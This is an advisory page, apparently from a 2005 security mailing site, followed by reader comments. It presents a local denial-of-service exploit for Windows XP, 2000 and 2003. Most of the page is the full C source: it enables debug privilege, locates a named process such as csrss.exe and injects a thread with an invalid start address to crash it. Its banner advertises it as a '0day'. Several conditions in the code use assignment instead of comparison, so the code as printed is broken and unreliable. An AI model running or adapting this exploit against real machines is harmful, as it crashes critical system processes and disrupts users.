|
Brought to you by:
Suppliers of:
|
|
|
| |
| The following exploit call the function CreateRemoteThread() with the following parameters "Process,0,0,x,0,0,0", which in turn will cause all the processes opened by the OpenProcess function, to crash, effectively causing a aDoS. |
| |
Credit:
The information has been provided by Nima salehi.
The original article can be found at: http://www.ashiyane.com/
|
| |
Vulnerable Systems:
* Windows XP SP 2 and prior
* Windows 2000 PRO SP 4 and prior
* Windows 2000 Server SP 4 and prior
* Windows 2000 AdvServer SP 4 and prior
* Windows 2003 AdvServer SP 1 and prior
Exploit:
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
BOOL exploit(char* chProcessName)
{
HANDLE hProcessSnap = NULL;
HANDLE hProcess = NULL;
BOOL bFound = FALSE;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
UINT uExitCode = 0;
DWORD dwExitCode = 0;
LPDWORD lpExitCode = &dwExitCode;
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_READ,&hToken))
return FALSE;
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
return TRUE;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = 1 ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,0,0,0);
CloseHandle(hToken);
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap = INVALID_HANDLE_VALUE)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("\n[+] Search For Process ... \n");
while(!bFound && Process32Next(hProcessSnap, &pe32))
{
if(lstrcmpi(pe32.szExeFile, chProcessName) = 0)
bFound = TRUE;
}
CloseHandle(hProcessSnap);
if(!bFound){
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf("[-] Sorry Process Not Find \n");
return(FALSE);
}
printf("[+] Process Find \n");
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION, FALSE, pe32.th32ProcessID);
if(hProcess = NULL){
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf("[-] Exploit Failed :( \n");
return(FALSE);
}
printf("[+] Send Exploit To Process ...\n");
CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0);
printf("[+] Successful :)\n");
return(pe32.th32ProcessID);
}
int main(int argc,char **argv)
{
char* chProcess = argv[1];
COORD coordScreen = { 0, 0 };
DWORD cCharsWritten;
CONSOLE_SCREEN_BUFFER_INFO csbi;
DWORD dwConSize;
HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
GetConsoleScreenBufferInfo(hConsole, &csbi);
dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize, coordScreen, &cCharsWritten);
GetConsoleScreenBufferInfo(hConsole, &csbi);
FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten);
SetConsoleCursorPosition(hConsole, coordScreen);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_GREEN| FOREGROUND_INTENSITY) ;
if(argc !=2) {
printf("\n");
printf(" ===================================== \n");
printf(" > Microsoft Windows CreateRemoteThread Exploit Version 2.0 (0day) < \n");
printf(" > Now All Process Will Crash < \n");
printf(" > BUG Find By Q7X ( Nima Salehi ) Q7X@Ashiyane.com < \n");
printf(" > Exploited By Q7X ( Nima Salehi ) Q7X@Ashiyane.com < \n");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE);
printf(" > Compile : cl -o nima.c ( Win32/VC++ ) < \n");
printf(" > Usage : nima.exe Process < \n");
printf(" > Example : nima.exe csrss.exe < \n");
printf(" > Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000 AdvServer (SP4) < \n");
printf(" > Windows 2000 Server (SP4), Windows 2003 (SP0 , SP1) < \n");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf(" > Copyright 2002-2005 By Ashiyane Digital Network Security Team < \n");
printf(" > www.Ashiyane.com ( Free ) www.Ashiyane.net ( Not Free ) < \n");
printf(" > Special Tanx To My Best Friends : Behrooz_Ice - ActionSpider < \n");
printf(" > illwill - m_lover_2003 - silversmith - crash - Uranium < \n");
printf(" ===================================== \n");
}
else
exploit(chProcess);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED |FOREGROUND_GREEN|FOREGROUND_BLUE);
}
/* EoF */
|
| Subject:
|
Remote or local |
Date: |
8 Dec. 2005 |
| From: |
BORODAC |
Usage : nima.exe Process
Remote or local Exploit? |
|
| Subject:
|
CreateRemoteThread DoS |
Date: |
11 Dec. 2005 |
| From: |
hienmv0408 |
| This is bug for DDOS |
|
| Subject:
|
I dont understand how this is DOS |
Date: |
18 Dec. 2005 |
| From: |
kromrey |
| Don't like defending windows.. But if you have the SE_DEBUG_NAME privilege this seems to me one of many possible ways you could cause a process to terminate. With the SE_DEBUG_NAME looks like there are a lot of ways that you could bring a process down. What am I missing? |
|
| Subject:
|
RE: Remote or local |
Date: |
25 Dec. 2005 |
| From: |
flfwxp |
| it's a local exploit , the remote word is in the CreateRemoteThread fonction so don't get confused |
|
| Subject:
|
A {Remote or local} |
Date: |
26 Dec. 2005 |
| From: |
LightWolf |
| This is Local Exploit. |
|
| Subject:
|
Excellent |
Date: |
4 Jan. 2006 |
| From: |
IRSDL |
| You can be the best now! ;) I hope secure world for all special iranian
|
|
| Subject:
|
Thats Greate |
Date: |
20 Dec. 2007 |
| From: |
Toomaj.Rasht.Boy |
Local Exploit is a methode for connecting to proccess level on local and your exploit run at self
but in remote exploit you can access to proccess level on remote computer
then your exploit is a local , and should be you runiing that on local computer
very nice, that's Irananian exploit |
|
|
|
|
|
|
